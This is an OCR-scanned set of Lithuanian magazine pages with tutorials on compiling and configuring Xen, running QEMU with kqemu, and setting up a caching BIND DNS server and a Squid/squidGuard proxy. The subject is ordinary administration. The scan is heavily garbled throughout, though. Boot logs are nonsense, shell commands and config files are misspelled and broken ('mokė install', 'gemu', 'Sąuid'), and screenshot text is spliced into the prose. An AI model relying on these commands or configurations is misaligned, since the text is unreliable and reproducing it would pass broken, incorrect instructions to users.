ElTū-isi write access UL) he enabled Guring recovery. 
Kiouenald start ing: 
Eil 


Commi1 Intervai 5 seconds. 
recoverų tonpiete. 

iš: rounted fliesųsten ulth ordered data mode 
: Nauntea root (ext3 fl lesusten) readonių, 

Ing urused kernel memorų: 32k treed 

+ version 2.66 bootins, 


1 startup 
linux krovimasis xterm lange atrodo kiek kelstokai 


2ies 
Ilnux, Yen, vmware Ir Ural našumo palyginimas 


OS. Toje pačioje operacinėje sistemoje veiks ir vartotojiški įrankiai, 
skirti viešinčių OS valdymui. Kiekvienos viešinčios OS paleidimui Xen 
sukuria naują virtualią mašiną, kuri atlieka izoliuotos OS aplinkos 
vaidmenį virtualaus asmeninio kompiuterio pavidalu. Pagal darbo 
principą Xen galima palyginti su daugiaužduotine OS, tiktai, priešingai 
nei tokia OS, kuri kiekvienam procesui sukuria izoliuotą adresų erdvę 
Iraplinką, Xen tą patį daro ne su procesais, o su kitomis operacinėmis 
sistemomis. Vienu žodžiu, su Xen vieną fizinį AK galima lengvai 
paversti į daugybę virtualių. 


ĮPovandeniniai akmenys] Be abejo, neapsieita ir be povandeninių 
akmenų (staiga prisimenu aksiomą: „Už viską reikia mokėti“). 
Išvardinsiu keletą apribojimų, kuriuos Xen pritaiko vartotojui: 

1. Norint operacinę sistemą paleisti virtualioje Xen mašinoje, 
būtina patenkinti vieną iš šių sąlygų: įdiegti specialų OS bran- 
duolio pataisymą, kuris ją adaptuoja virtualiai mašinai (šiuo metu 
pataisymai prieinami Linux, NetBSD ir FreeBSD sistemoms), arba 
nusipirkti su virtualizacijos technologiją gebantį dirbti procesorių 
(„Intel“ kuriamas VT arba AMD kuriamas Pacifica), tuomet virtu- 
alioje mašinoje bus galima paleisti kad ir Windows XP. 


2. Visos virtualios mašinos viduje paleidžiamos OS negali turėti 
bendrų particijų (siekiant išvengti failų sistemos sugadinimo) irturi 
naudoti joms iš anksto išskirta operatyvinės atminties sritį (visą 
turimą operatyvinę atmintį reikia padalinti iš veikiančių OS kiekio). 
Taip pat kiekvienai viešinčiai OS prireiks atskiro swap'o. 

3. Xen nemoka virtualios mašinoms padalinti vaizdo plokštės (aš 
nelabai įsivaizduoju, kaip tai apskritai būtų galima padaryti), todė! 
viešinčioje OS teks įdiegti VNC arba naudoti tinklinį priėjimą prie 
X-Window sistemos. 

4. Su Xen atsisako veikti nvidia tvarkyklės. 


[Veisiam gyvūnėlius] Savo eksperimentams naudosime 
Linux. Tokiuose distributyvuose, kaip Fedora Core, Debian 
arba SuSe Xen galima įdiegti kaip įprastinę programinę įrangą. 
panaudojant standartines priemones (rom, apt-get) — mes 
šių metodų neaptarinėsime. Geriau Xen parsisiuskime ir 
sukompiliuokime savomis rankomis (linkėjimai Slackware 
vartotojams). Archyvą galima parsisiųsti iš čia: www.cl.cam. 
ac.uk/Research/SRG/netos/xen/downloads/xen-3.0-testing-src. 
tgz. Išpakuojame jį į katalogą /usr/src (rekomenduoju viska 
daryti būtent šiame kataloge), ir pereiname į naujai sukurtą 
katalogą /usr/src/xen-3.O-testing. Kiekvienam branduoliui skirti 
atskiri pataisymai („Is patches“). Aš gavau Xen su pataisymais 
2.6.12 versijai. Imame archyvą linux-2.6.12.tar.b22 ir įkeliame 
ji į einamą katalogą (jeigu tu susiruošei siųsti branduolį iš 
interneto, tai geriau neskubėk — įdiegiklis tai padarys pats). 
Dabar veikiame taip: 


2 mok 
+* moke install 


+ Elpan, 74362/1126080 $iles, di1RStV2251100 bincks 
EXT3 FS On hdai2, internal Journal 

+ Serting ths System Clock using the Karduare Clock as referance. 
+ Cleaning ia uodom.... 

* Calcuiating module depondanc Les. 

» Loading modules... 

+ Grrating device Aanper devices... 

+ Setting up LM Volume Groups. 

+ Starting Enterorise Volume. 

+ Checking all file sųstens. 
* Nounting local f lesystei 


Įdenent Systen. 


+ Running Odhs-doun to mke sūre reso1V.cont Is Ok... [a] 
+ Initializing Liupdoun state... ta] 
+ Reading desktao files... [42 
Starting hotolug subsiktes..- tei 
Čontigur ing netuorė Interfaces. toi 
Setting the Sųsten Clock using (he Marduaro Ciock os reference... || [BN] 


+ Sunehronizing clock ta ntp.ubintulinux. Org. 
rar + Tenporarų faliure In Aame resolution [ 
+ Initiaiizing Fandon nusber gererator.... t 
+ Getting up X eervar socket dirsctarų, t 
+ Šettinė up ICE sacket directory, t 
+ Entering runlevel: 3 
+ Sterting systen iog daemon. [ 
» Starting kernel 104 daemon, i 
» Setting up ALSA... t 
* Starting GNOME Dišplaų Manager... ią 
[ 
[ 
i 


« Stanting Cannon Unix Printing System: cupsd 

» Starting sųsten message bus: 

+ Starting Hardhare abstraction lauss: 

= Sturtinę Internet superserver.... 

+ Startinį Postžix Mail Transport Agent... 
/dev/tem: map: Resource tepararilų unavai labie. 
This arocessor "AMD Seannon(ta) 25004“ 1 knoun „not. (0 supoort pouer-saving. 

+ Štartinę pouernou 


+ CEU freauencų scaling not supported tai 
* Stertinę anac(Nronistic cron: anscron tai 
+ Startinę Geferred Executlon scheduler... [aki 
+ Starting perlodic command scheduler... La] 
+ Unecking batterų state... Lai 


Ubuntu 5.04 "Woarų Nedgehog" ubuntu ttyi 
ubuntu login: 


/3'sterm 
Ubuntu Inu Merm lange 
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Taip mes sukompiliuosime du Xen skirtus branduolius su 
konfigūracija pagal nutylėjimą ir įkelsime juos į katalogą /boot. 
Branduolio atvaizdas su galūne „-xen0“ tai supervizorius, 
standartinis branduolys su aktyvuotu Xen palaikymu ir standartiniu 
tvarkyklių rinkiniu. Būtent šį branduolį mes naudosime vietoje to, 
Kuris šiuo metu įdiegtas tavo distributyve. Antrasis atvaizdas, kurio 
galūnė „-xenU“ — tai branduolys, kurį reikia naudoti viešinčiose OS 
(tiksliau šnekant, Linux distributyvuose), o tiesiogiai su aparatūra 
dirbančios tvarkyklės jame pakeistos emuliacijos sluoksniu. 
Norint sukompiliuoti nuosavą Xen skirta branduolį, reikia atlikti 
keletą veiksmų. Visų pirma, reikia paleisti branduolio-supervizo- 
raus konfigūratorių: 


d linue26.1Z-er0 
mokė ARCH>1en menucontių 


Jį mes konfigūruojame pagal savo poreikius, nepamiršdami įjungti 
šių opcijų: 


XEN Privileged Guest (domain 0) 
XEI -> Bloch-device bachend driver 
XEN -> Network-device backend driver 


XEN -> Block-device frontend driver 
XEN -> Watwork-device frontend driver 
XEN -> Saub memory before freeing It to Ken 


Dabar paleidžiame viešinčios OS branduolio konfigūratorių: 


4 d „Anux26.250n0 
4 meke AROH sen menuconlią 


Darome viską taip pat, skirtumas tik tas, jog šiame branduolyje 
visiškai nenaudingos opcijos „XEN -> Privileged Guest (domainO)“ 
ir „XEN -> Physical device access“. Ir galų gale sukompiliuojame. 
bei įdiegiame branduolius: 


a 
mokė 


+ moke install 


Įdiegimo etapas praeitas, pradedame konfigūravimą. Iš pradžių 
xenU branduolio modulius reikia nukopijuoti į šakninę viešinčios 
OS failų sistemą (tarkim, Ji yra particijoje hda2): 


+ mkdir /mnt/guest 
> mount /dev/hda2 /mnl/gves! 
4 G a Allymodules/2.6.12.6-xe1U /m 


uest/lit/modulės 


Telieka sukonfigūruoti grub (lilo nepripažistamas), kad jis krautų patį 
Xen ir supervizoriaus branduolį. Atidarome bylą /boot/grub/menu, 
Ist ir į ją pridedame šiuos įrašus: 


+ vi /bool/grub/menu.kt 
tille Xenlinux 
+ paricija su katalogu /boot 
root (100) 
+ kiauname Ken 
kenmei /boci/xen-3.0.42 donO mem-=13 
A ir branduolį-supervizorių 
module /bcot/nmlinuz-2.6.12-x610 1001 


/dev/hdal ro: console tiy0 


Čia aš manau, kad tavo einamo Linukso failų sistemos šaknis 
įsikūrusi particijoje hda1. Argumentas domO mem nurodo at- 
minties kiekį (kilobaitais), kuris prieinamas supervizorinei OS. Kiek 
jai skirti atminties — spręsk pats. Aš čia paprastai nurodau pusę 
fizinės atminties kiekio — likusi dalis atitenka viešinčioms OS. 
Viskas, baigėme. Dabar perkrauk mašiną, grub meniu pasirink 
punktą XenLinux ir pasiruošk skaityti toliau :). 


[Pingvinas pingvino viduje] Paradoksalu, tačiau Xen, nepaisant 
viso jo sudėtingumo, yra stebėtinai lengvai administruojamas 
produktas. Norint išmokti darbo su Xen pagrindų, galima iš viso 
neskaityti dokumentacijos. 

Aptarsime Ubuntu Linux distributyvo paleidimo pavyzdį su virtu- 
alia Xen mašina. Norint įgyvendinti šį sumanymą, mums prireiks 
į kietąjį diską įdiegto (šiuo atveju į particiją /dev/hda2) Ubuntu 
distributyvo, konfigūracinės bylos ir šiek tiek Linux žinių. Vietoje 
konfigo pavyzdžio paimsime bylą /etc/xen/4mexample1. Nukopijuok 
Ją į /etc/xen/ubuntu ir šiek tiek pataisyk: 


+ Vi /elvher/ubuniu 

£ mūsų viešinčiai OS skirlus branduolys 
kernel „/hoot/vmlinuz-2.6.12-xenU“ 

+ išskiriame 64Mb operatyvinės atminties 
memoy = 64 

* pavadinimas gali 
name = „Ubuntu“ 
+ amuliuojame vieną finklo plokštę 

nis = | 

+ MAC ir IP adresai 

vii = [„mac=fedd:00:00:00:11, ip=1000.1“ ] 
7* viešinčioji 05 matys tik dvi disko p 
44 (čia /dev/hda2 — šaknis, o /dev/hda3 swap) 
disk = [„phyhda2,hdo2,“, „phy:hde3,hdo3,w“ | 

4 nurodome šakninę. partija 

root = „/dev/hida2 10“ 

+ bronduoliui perduodami parametrai (nurodoma 


būti bet koks 


Dabar reikia iš naujo primontuoti particiją su Ubuntu (/dev/hda2) 
Ir atitinkamai paredaguoti jo /etc/fstab konfigą. Darbo liko visai 
nedaug. Surenkame komanda „xm create ubuntu -c“ ir gauname 
priėjimą prie pirmosios Ubuntu konsolės, kurioje galima stebėti 
branduolio krovimąsi ir inicializaciją, o po to ir kvietimą įsijungti 
į sistemą. Atgal į xterm sugrįžtame pasinaudodami klavišų kom- 
binacija <Ctrl+/>, 0 į Ubuntu patenkame su komanda „xm 
console ubuntu 


gemu“] Iš mano pusės būtų nuodėmė nepapasakoti 
torių gemu, kurio vienas pagrindinių privalumų — dide- 
lis emuliavimo greitis. Oeėmu autorius Fabrice Bellard yra labai 
kompetentingas šiuo klausimu žmogus. Jis savo svetainėje net 
ateikė dokumentą, kuriame pasidalino emuliavimo kodo optimi- 
vimo paslaptimis. Antras išskirtinis gemu bruožas — galimybė 
dirbti dviem režimais: viso AK emuliavimo režime ir procesoriaus 
muliavimo režime. Pirmasis režimas leidžia emuliatoriaus viduje 
paleidinėti operacines sistemas, o antrasis — vykdyti dvejetaines 
(vykdomas) bylas su kitos architektūros procesoriumi. Pavyzdžiui, 
panaudojant gemu galima su paprasčiausiu Pentium'u paleisti 
PowerPC vykdomą bylą. Dabar gemu pripažįsta x86, ARM, SPARC, 
PC ir MIPS architektūrų procesorių emuliavimą. Pats emulia- 
torius gali dirbti daugelyje architektūrų, UNIX, Windows ir MacOS 
X šeimų operacinėse sistemose. 

itykinai neseniai Fabrice Bellard savo svetainėje (fabrice.bel- 
lard.iree.fr) pateikė Linux branduolio modulį kgemu, kuris gemu 
paverčia tikra virtualia mašina (dvejetainį kodą dabar vykdo ne 
virtualus, o fizinis procesorius). Modulio kodas nėra prieinamas, 
itorius jo neatskleis, kol negaus materialinės paramos. Tačiau 
open saurce bendruomenės entuziastai laiko veltui nešvaistė ir 
au išleido alternatyvaus modulio gym86 (www.gvm86.org) alpha 
versiją, kuri binariškai suderinama su kgemu. 

Enama gemu (0.8) versija atkuria šią aparatinę konfigūraciją: /440 
mikroschema, Cirrus CLGD 5446 vaizdo plokštė, pelė ir klaviatūra 
su PS/2 sąsaja, NE2000 tinklo plokštė ir Creative SoundBlaster 16 
garso plokštė. Be to, gemu emuliuoja nuosekliąsias, lygiagrečiasias 
USB jungtis ir pripažįsta SMP iki 255 procesorių. 


[Sveiki atvykę į virtualųjį pasaulį] Metas išbandyti gemu veikimą. 
Iš oficialios svetainės (fabrice.bellard.free.fr/gemu) parsisiunčiame 
paskutines gemu ir kgemu versijas, į katalogą /tmp išpakuojame 
archyvą gemu-0.8.0.targz, o kgemu-0.7.2.tar.gz — į ką tik sukurtą 
tmp/gemu-0.8.0. Jame surenkame jau klasikinėmis tapusias ko 
mandas „/configure R4 make 88 make install“. Įdiegiklis įdiegs 
Wkdomą gėmu bylą ir kitas reikalingas bylas, taip pat į /lib/modules 
įkels kgamu modulį. Kgemu veikimui reikalingas priėjimas prie 
tmpfs, todėl į /etc/fstab būtina pridėti eilutę „tmpfs /dev/shm tmpfs 
defaults O O“, įvykdyti komandą „mount -a“ bei užkrauti modulį: 
„modprobe kgemu“. 

Dabar aptarsime gemu galimybes, remdamiesi kokios nors 
abstrakčios OS įdiegimo pavyzdžiu. Iš pradžių mes turime sukurti 
virtualų kietąjį diską. Tai galima padaryti dviem būdais: su komanda 
dd bylą užpildyti iš /dev/zero paimtais nuliais arba su komanda 
gemu-img. Antrasis būdas teisingesnis ir paprastesnis — jį ir 

rsime. Sukursime 1 Gb dydžio kietąjį diską: 


2 gemu-img creale disking 16 


Taip pat mums reikalingas ISO atvaizdas su OS įdiegikliu (jį galima 


lengvai gauti iš kompaktinio disko: „dd if=/dev/cdrom of=cd.iso 
conv=noerror“). Dabar paleidžiame gemu: 

* gemu <hdo diskimg om tdLiso boo! d -monil 
Argumentas „-hda“ nurodo mūsų virtualų diską, „ cdrom' nurodo 


kompaktinio disko atvaizdą, „-boot d“ — krovimąsi iš kompaktinio 
disko (čia galimas vienas iš trijų variantų: ,a', „b“ arba „C', Ly 
lankstusis diskelis, kietasis diskas arba CD-ROM), „-monitor stdio 
suteikia priėjimą prie valdančios gemu konsolės. 

Jeigu viskas padaryta teisingai, turėtų atsidaryti gemu langas, 
kuriame prasideda OS įdiegiklio užkrovimas (arba pačios OS 
užkrovimas, jeigu tu naudoji LiveCD). Na, o toliau reikia įprastiniu 
būdu įdiegti pačią OS. Jeigu operacinė sistema paprašys antro 
įdiegimo disko, tai jį lengva pakišti, gemu konsolėje surinkus dvi 
komandas: 


ejadt 
chunge cdiom 


Pabaigus Įdiegimą perleidžiame gemu ir džiaugiamės nauja OS: 


* genų ki nitor stdio 


Beje, galima apsieiti ir be kietojo disko atvaizdo, nurodant r 
particiją: 


+ gamu —hda /dev monitor stalo 
Tačiau aš taip daryti nerekomenduočiau: rizikuoji sugadinti failų 
sistemą. Jeigu jau tau šito labai reikia, geriau naudokis kita ko- 


manda: 


44 gemu snopshot /ev/hda monitor: stio 
Taip duomenys bus įrašinėjami ne į realų diska, o į laikiną byla 

Deja, mūsų straipsnio apimtis neleidžia realiai atskleisti visų gemu 
galimybių, kaip kad tinklo susijungimų kūrimas, įmontuotas SMB 
serveris, kitų architektūrų vykdomų (dvejetainių) bylu paleidimas 


arba virtualios mašinos būklės išsaugojimas. 


5! gemu 


Ir vėl damn small Inux 
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FERRUM 


Taupome pinigus 


su „tuksu“ 

Efektyvus kešuojančio DNS ir Proxy 
serverio konfigūravimas 

SUTAUPEI — REIŠKIA UZDIRBAI. NE VEL- 
TU| YRA TOKIE SPECIALISTAI, KURIE DIENŲ 
DIENAS TIK IR GALVOJA, KUR IR IŠ KO 
GALIMA BŪTŲ SUTAUPYTI. AŠ TAU SIŪLAU 
PRADĖTI TAUPYTI Į PAGALBĄ PASITELKUS 
LINUX. NE, MES ILGAI IR NUOBODZIAI 
NEDISKUTUOSIME APIE GPL BEI APIE 
TAI, JOG GALIMA IŠMESTI WINDOWS 
IR VIETOJE JŲ ĮDIEGTI LINUX. ŠIANDIEN 
MES PAKALBĖSIME APIE „PRAKTINĮ 
TAUPYMĄ“. 


[Praktinis taupymas] Praktinis todėl, kad mes taupysime 
savo žinias ir sugebėjimus pritaikydami praktiškai, o ne 
teoriškai. O taupyti čia yra iš ko. Mes galime įdiegti 
kešuojantį DNS serverį ir taip paspartinti DNS užklausų 
vykdymą, įdiegti kešuojantį proxy serverį ir smarkiai 
sutaupyti tinklo srauto, taip pat įdiegti http nukreipiklį 
(redirector), kuris mums leis filtruoti www turinį ir pamiršti 
reklamines antraštes. Norint įgyvendinti visus aukščiau 
išvardintus dalykus, visiškai nebūtina turėti kompiuterį 
su išskirtine linija — tiek DNS, tiek proxy puikiai veiks 
paprasčiausioje naminėje mašinoje, kuri prie interneto 
būtų prijungta per modemą. Beje, šie servisai ne šiaip 
sau veiks, o realiai taupys tavo pinigus. 


IMPLANT SOFTWARE 


HACK 


SCENA 


I/ dėl mdc.key rakto nebuvimo 
(ontols į); 


1/ „“ aonos mūsų servetis nepalaiko; lipas hint 


[Kešuojantis DNS serveris] Kešuojantis DNS serveris | // Ieiškia, kad byloje named.ca yra šakninių 
leidžia sutrumpinti domenų vardų išsprendimo laiką, taip !/ (0!) DNS saveių adresai 

pat šiek tiek sutaupyti tinklo srauto (maždaug 5-796). zone „in ( 

Daugumoje distributyvų DNS serveris įdiegtas pagal Type Ain; = 

nutylėjimą, todėl iš karto pereisime prie jo konfigūravimo. file: „namedko“; 

Sukursime pagrindinę demono named konfigūracijos LŽ 

bylą: 


UNIXOID 


1/ 0.0.127.in-addr.aipa zona lokali zono, 
1/ aprašyta byloje named.local 
rone „0.0.127.in-addr.arpa“ in ( 
type master; 
file „named.locol“; 
i 


> vi /et(named.conf 

oplions | 

// darbinis katalogas 
directory „/var/naned“; 


1/ Nisas: wžklausos bus peradiesuojamos. tiekėjo 
// DNS seiveriui 192.168.99.1; jeigu su šiuo 
// seweriu iškils nesklandumų, tuomet lokalus 
// semeris atsakymo įeškos savo keše arba 


Parametras forward gali turėti vieną iš šių reikšmių: „only“ — mūsų 
DNS serveris niekada neturi bandyti savarankiškai apdoroti jam 
perduotos užklausos: „first“ — mūsų serveris turi pats bandyti 
// savarankiškai įvykdys: užklausą apdoroti užklausą, jeigu iš išvardintų tiekėjo DNS serverių nebuvo 
foword first; i gautas reikiamas atsakymas. 4 H 
fowardes į 19216899.1; |; Parametre fonwarders tarp figūrinių skliaustelių galima nurodyti 
DNS serverių IP adresų sąrašą, kuriems mūsų DNS serveris 
peradresuos jam siunčiamas užklausas vietoje to, kad bandytų 
atsakyti į jas pats. IP adresai skiriami kabliataškiu, 


CODING 


UNITS 


// šios oprijos reikia tam, kad named nesikeiktų 


Be to, kataloge /var/named turi būti dar dvi bylos: named.ca 
(sukuriama įdiegiant bind paketą) ir named.local. Kad pastaro- 
slos nereikėtų kurti rankiniu būdu, ją gali pasiimti iš katalogo 
usr/share/doc/bind-9.2.3/dhcp-dynamic-dns-examples/bind/ 
var/named. 

Dabar paleiskime named: 


+ named 
Patikrinkime, ar jis veikia: 
ps 0 | Grep named 
Ši komanda išveda procesų, kurių pavadinime yra žodis named, 


sąrašą — tavo named turėtų jame būti. Įsitikiname, kad serveris 
pasileido be jokių klaidų ar perspėjimų: 


4 tail /vavlog/messagos 


Oain Ilpama Bux Garnamu Cepane Hacrpoira Ūnpamea 
ra du G k. £ 
i 


GNe6 K "Narmames 


| 
sono || 
memotnį 


Iype Nt 
Is named ca" 


Kope 00 127 inacdrarpa" | 
os master 
i "named Deal“ 


1/ bind 
bird įdiegimas su mmdrakė (Mandrake sistemoje) 


Irma: mnames M search 
+ Mandrake choces | 
AI packages aiphabeticai + Nata mformaton 
AI paciages, by group š Makin information | 
Development Namo Adenetmoli Ab | 
LS Sima 
+ Graptical Enykonmen a 
y Kr Krdk program 
Description Kito, krdc progiamen ||| 
Nepo Selected: 1 MB /fres dek space 2144 MO Natali ax | 
2 Kite 


bylos /ete/named.conf redagavimas 


'3/ named 
paleistas Ir veikia 


Dabar telieka byloje /etc/resolv.conf aprašyti mūsų domeną ir 
grįžtamojo ryšio (Ioopback) sąsajos IP adresą: 


7 vi /etdresolv.cont 
domain: mydomain..lt 
nonmesenver 127.0.0.1 


Be abejo, serverio konfigūravimas tuo nesibaigia. Pavyzdžiui, 
galima aprašyti, kokie klientai turi teisę naudoti mūsų serverį, 
O kokie — ne. Tačiau pagrindinė užduotis, t.y. kešuojančio DNS 
serverio paleidimas, atlikta. Reikia pastebėti, kad toks serveris 
efektyvus ne tik lokaliame tinkle, tačiau ir tuomet, kai tu savo 
kompiuterį naudoji išdidžioje vienatvėje svetainės pradės 
atsidarinėti šiek tiek greičiau, kadangi named paleistas lokaliame 
kompiuteryje. 


[Kešuojantis „proxy“ serveris] Su Sąuid proxy serveriu galima 
kešuoti www srautą, blokuoti reklamines antraštes, apibrėžti, 
kokias bylas vartotojai gali siųstis, o kokių — ne, nurodyti 
maksimalų perduodamo objekto dydį ir net apriboti tam tikros 
Klasės vartotojams skiriamą pralaidumą. Kaip tu jau supratai, 
detalus Sguid konfigūravimas — tai atskiro straipsnio tema, todėl 
čia mes aptarsime tik pirminį proxy serverio sukonfigūravimą. 
Tačiau net ir po bazinio tiuningo tu realiai sutaupysi tinklo srauto 
(maždaug 20-2594). 

Tarkim, pas mus yra nedidelis tinklas iš 10 kompiuterių. Esminio 
skirtumo nėra, tačiau kompiuterių kiekį reikia įvertinti apskaičiuojant 
išskiriamos atminties kiekį ir Sąuid kešo dydį. Dešimčiai kompiuterių 
kuo puikiausiai užteks 1 Gb kešo: gauname po 100 Mb vienam 
kompiuteriui. To daugiau nei pakaks. Pavyzdžiui, pagal nutylėjimą 
ta pati Opera naudoja 10 Mb, ko paprastam vartotojui visiškai 
pakanka. O 100 Mb pakaks reikliam vartotojui, kuris pasauliniame 
voratinklyje praleidžia labai daug laiko. 

Sguid konfigūruoti nėra sudėtinga (bet kokiu atveju, tai 
nesudėtingiau, nei konfigūruoti Apache ir panašius tinko servi- 
sus). Įdiek paketus Sguid ir sguidGuard. Pirmasis paketas — tai 
proxy serveris, o antrasis yra sguidGuard nukreipiklis (redirector), 
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atliekantis šias funkcijas: 

* vartotojų priėjimo valdymas; 

* į juodąjį sąrašą įtrauktų URL blokavimas, pavyzdžiui, svetainės 
su suaugusiems skirtu turiniu; 

* priėjimo prie tam tikrų URL blokavimas su reguliariosiomis 
išraiškomis; 

* reklaminių antraščių pakeitimas į tuščius paveiksliukus: 

* skirtingos priėjimo taisyklės skirtingoms vartotojų grupėms, 
pagal tam tikrą paros, savaitės laiką, datą ir tt. 


Dabar pradėsime redaguoti pagrindinį /etc/sguid/sąuid.conf.: 


4 i /aidsguid/sguid on 
J įungis i advesos, por: Juriuos bus Klausomasi 
1/ Nienių užklausų 

Mip por: 192.168.1.1:3128 


1/ operatyvinės atminties: kiekis, Kuri naudas 

JV proxy: seneris; šis parametras turi būti 

I/ ne: didasnis už trečdalį fizinės otmintios: kiekio 
cache mem 85 MB 


1/ Katalogas, Kuriame. bus: patalpintos: kešas; 
1/ gumos: skaičius — toi keše: dydis megabaiais, 
//  įeigu reikia, kad is užimtų visą 


//  aptibojame priėjimo. Ieises 
hitp access allow localhost 

hip access allow allowed hosis 
Kit access allow SSL paris 
hip accoss dony all 


// galima aprašyti vartotojus, kuriems leidžiama 
// naudotis sąuid (jonas, admin) 

ident laokup on 

ad! allowed users user jonas: admin 

hip access allow allowed Users 

hip access deny all 


Be abejo, tai toli gražu ne pilnas konfigas, tačiau manau, jog 
toliau tu susitvarkysi pats. Noriu pastebėti, kad kompiuterių, 
kuriems leidžiamas priėjimas, sąrašą galima nurodyti atskiroje 
byloje, pavyzdžiui, taip: 

ad allowed hosts sic „etd/sąuid/hosts.lnt“ 


Pati /etc/sguid/hosts.txt byla šiuo atveju atrodo štai taip: 


76 Vi /ei/sąvid/hosts.txt 
+ Jonas 


partiją, 
1/ iš pasticjos dydžio. atimk 2094 
ir nurodyk šią 


Uenne Npanka ua Sacnauu Hacrpošea Crpaka 


1/ wikšmę; antras: skaičius. pir- 
mojo Iygio 


J/ katalogų: kiekis; Irečias + antro |varnins: bad syntax, perhaps a bogus 
lygio katalogų kiekis 3018 2 s 
cache dir /usi/local/sąvid 1024 || 3030 pts0 s 


16 254 


J/ komgiuteriai, iš kurių leidžiama 
prieiti prie 

1/ proxy serverio 

ac! allowed hosis sic 192.168.1.0/ 


global options: 
;; Got answer 


asa ->>HEADER<<- opcodo 
Ši £1 2 d; 

ad Iotalhosi sic 127.0.0.1/ rio nie a 
256255.255255 


;; OUESTION SECTION: 


Id -— E „bind 
1/ Ieidžiomų jungčių sarašas šis is aaa 


Ge allow. ports port 80 
sel allow paris port 21 
sel SSL poris port 443 563 


;; ANSWER SECTION: 


;; Ouery time: 27 msec 
i; SERVER: 
;; WHEN: Mon Mar 
i; MSG SIZE rcvd: 48 


// draudžiame visos jungtis, išskyrus 
„allow poris“ 
kitp access: deny lallow ports 


// Visoms  junglims, išskyrus nuro- 
dytos 50 

J sad SSL pos“, 
CONNECT metodą 

tip. access dony (ONNECT 155L 
paris 


[rootūdhsilabs den]t | 
A ai Shell 


uždroudžiame 


'4/DNS 
DNS serverio darbo testavimas su įrankiu dig 


OUERY, 


version .bind. 0 


[rootėdhsilabs den]t ps -ax | grop named 


'-'2 See http: //procps .s£.net/fag.html 


0:00 naned 
0:00 grep named 
| [rootūdhsilabs den] dig elocalhost -t txt -c chaos version.bind 


<4>> DiG 9.2.3 <<>> Glocalhost -t txt -< chaos version.bind 


printend 


status: NOERROR, id: 4971 
1, ANSWER: 1, AUTHORITY: O, ADDITIONAL: O 


ca TXT 


CH 


TXT "9.2.3" 


127.0.0.1453 (localhost) 
6 18:21:57 2006 


1921681.2/255.255.255.255 
+ Paltos 
192168:1.3/255.255.255.255 
> Onutė 
192.168.1,4/255.255.255.255 


Atskirą bylą naudoti patogiau, taip „neužteršiamas“ pagrindinis 
konfigas. Atkreipk dėmesi: hosts.txt priėjimo teisės turi būti tokios 
pačios, kaip ir sąuid.conf. Dabar pamėginkime sukurti juodąjį 
URL sarašą: 


al Alacist url rogex games 
np access deny blacklist 
biip access allow all 


Šis juodasis sąrašas nepraleidžia tų nuorodų, kuriose yra žodis 
„games“. Analogiškai galima sukurti atskirą bylą ir į ją surašyti 
visas „blogas“ nuorodas. Pastebėk tai, kad visa tai mes padarėme 
su Sąuid priemonėmis neįdarbindami sąuidGuard. 

Sąuid paleisti paprasta: 


savi sąvid stort 


Nepamiršk, jog klientus reikia sukonfigūruoti taip, kad jie jungtųsi 
| 3128/tcp jungtį. 


[Redaktoriaus komentaras] Aš jau seniai naudoju dns/http 
kešavimą tiek namie, tiek darbe. Mano konfigūracija praktiškai 
identiška išdėstytai šiame straipsnyje, tiktai aš šiuos servisus 
paleidžiu neprivilegijuoto vartotojo vardu (named ir sąuid) ir 
naudoju skaidrų http proxy (transparent proxy), kuomet nėra 
būtinybės klientų naršyklės nustatymuose rankiniu būdu nurodyti 
proxy seiverio adresą ir jungtį. Dirbant šiuo režimu, Sąuid reikia 
sukompiliuoti su ugniasienės galimybe plius pagrindinėje Sąuid 
konfigūracijos byloje turi būti šios eilutės: 


4 Wi Jeldsąuid/sąuil.conf 

kitp port 127.0.0.1-3128 

Hipd acel host virtual 

tipd acel port 80 

Hipd acel vith pray on 

htipd accel wses host header on 


OpenBSD branduolyje aš suradau ir ištaisiau įdomią klaidą, kuri 
neleisdavo apriboti priėjimo teisių pseudoirenginiui pf(4). Dabar, 
pradedant OpenBSD 3.9, galima saugesnė konfigūracija: norint 
sėkmingai įvykdyti sisteminį iškvietimą ioct/(2) su DIOCNATLOOK 
operacija (susijungimų būsenos peržiūra), pakanka neprivilegi- 
juotam vartotojui sąuid iš sąuid grupės suteikti „tik skaitymo“ 
teises į įrenginį /dev/pf (anksčiau reikėjo teisių tiek skaitymui, 
tiek ir rašymui): 


4 dgip sąuid /dev/pt 
+ cmod g+r /devpi 


Išsamiau apie skaidraus proxy sukonfigūravimą OpenBSD sis- 
temoje gali paskaityti čia: www.openbsd.org/docs/steps/sąuid. 
html 


[„SguidGuard“ — asmeninis tavo tinklo srauto apsauginis] 
Ankstesniame pavyzdyje mes užblokavome priėjimą prie bet 
kokios svetainės, kurios nuorodoje (URL) yra žodis „games“. 
Akivaizdu, jog čia niekaip neaprašysi visų URL, kuriuose yra 
draudžiamas turinys, kaip antai: pornografija, prievarta, reklama, 
informacija apie narkotikus ir panašūs dalykai. Tokių svetainių 
pasauliniame voratinklyje neįtikėtinai daug. Ir čia į pagalbą ateina 
sąuidGuard. Jis papildo Sguid draudžiamų svetainių duomenų 
baze. Aišku, šią DB galima periodiškai atnaujinti, tačiau daugiau 
nereikia pačiam ieškoti mazgų su draudžiamu turiniu ir pačiam 
juos įtraukti į sąrašą — viskas jau padaryta už mus. Egzistuoja 
trys pagrindinės bazės: 

* sąuidGuard bazė prieinama adresu www.sguidguard.org/'black- 
list/ 

* MESD bazė prieinama čia: sąuidguard.mesd.k12.or.us/black: 
lists.tgz 

* Dansguardian bazę rasi čia: blacklist.dansguardian.orglcgi- 
bin/download.pl?type =downloadėfile =bigblacklist 


Mes naudosime sąuidGuard bazę, kadangi ji pateikiama kom- 
plekte kartu su pačiu sąuidGuard. Ši bazė apima reklamą, 
pornografines svetaines, agresijai, narkotikams, azartiškiems 
žaidimams, prievartai ir kitiems panašaus pobūdžio dalykams 
Skirtas svetaines. Tu įsivaizduoji, kiek firma sutaupys tinklo srauto, 
uždraudusi priėjimą prie visų šių dalykų? Po įdiegimo bazė pa- 
prastai sukuriama kataloge /usr/share/sąuidGuard-1-x-x/db. 
Tikiuosi, jog tu jau įdiegei sguidGuard paketą, todėl iš karto 
pradėsime konfigūravimą. Bylą /etc/sąuid/sąuidGuard.conf.sam- 
ple nukopijuok į /etc/sąvid/sąuidGuard.conf, kad po to mažiau 
reikėtų dirbti savomis rankomis. 


26 vi /etysguid/sąuidūvard.conf 

// Kelias iki bazės ir logų 

dbhome /ust/share/sąuidGuord-1.2.0/db 
logdir: /var/log/sąuidGuord 


J/ darbo laikas, dienų sutrumpinimai: s = Sunday, 
